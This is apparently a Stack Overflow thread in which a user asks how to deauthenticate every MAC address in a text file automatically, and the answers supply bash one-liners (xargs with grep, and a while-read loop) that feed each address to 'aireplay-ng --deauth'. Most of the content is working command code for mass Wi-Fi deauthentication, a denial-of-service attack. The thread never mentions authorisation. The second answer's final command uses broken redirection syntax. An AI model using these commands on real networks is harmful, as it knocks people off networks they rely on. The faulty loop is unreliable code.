# How To Save Every Line Of A Text File Into Different Variables

Tags: bash, macos, variables

i want to make a script which will deauth automatically all mac address which has been saved before in a text file.

So my text file looks like this:

```
C8:xx:xx:AC:xx:xx

3A:xx:Xx:12:xx:xx
```

upto 20 lines.
I want each mac address either in a single text file or storing in a variable.
To run for example

```
aireplay-ng --deauth 10 -b $mac1
```

Thanks

Comment: and yes i know after $mac1 missing wlan0mon.

Comment: Welcome to Stack Overflow. SO is a question and answer site for professional and enthusiast programmers. The goal is that you add some code of your own to your question to show at least the research effort you made to solve this yourself.

Answer (score 2, accepted):

Use `xargs`:

```sh
<input-file xargs -L 1 aireplay-ng --deauth 10 -b
```

To filter only valid mac addresses, use grep in the pipeline:

```sh
<input-file grep -o -E '(([[:xdigit:]]){2}:){5}([[:xdigit:]]){2}' |
  xargs -L 1 aireplay-ng --deauth 10 -b
```

Comment: why <input shouldn't it closed?

Comment: @ViperZCrew `<input-file` just feeds the content of input-file to the next command. No need to close it. Redirection ends with the commands that consumed it. (`xargs` for first script, `grep` for second script).

Answer (score 0):

You can do this with a simple while loop, replace `input.file` with the file name.

```
while read -r line; do aireplay-ng --deauth 10 -b $line; done < input.file
```

One trick you could do to make sure that you only get MAC addresses (assuming no other lines have colons and lines with MAC addresses don't have other content):

```
while read -r line; do aireplay-ng --deauth 10 -b $line; done < cat input.file | grep :
```

Comment: No problem! If this answer resolved your problem could you please mark it as accepted using the checkmark on the left? Thanks!